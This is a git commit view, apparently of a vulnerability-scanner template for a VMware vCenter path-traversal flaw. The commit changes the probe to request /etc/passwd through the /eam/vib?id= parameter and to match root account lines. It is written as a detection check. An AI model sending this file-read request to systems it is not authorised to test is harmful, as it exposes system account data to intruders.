Fix FP
parent
7d11a0e2af
commit
367a2434b3
|
@ -14,10 +14,10 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/eam/vib?id=/etc/issue"
|
||||
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vCenter Server"
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/08/01
|
||||
|
|
Loading…
Reference in New Issue